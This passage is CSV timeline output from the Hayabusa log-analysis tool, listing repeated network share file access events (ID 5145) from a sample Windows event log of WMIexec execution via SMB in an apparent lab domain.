10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
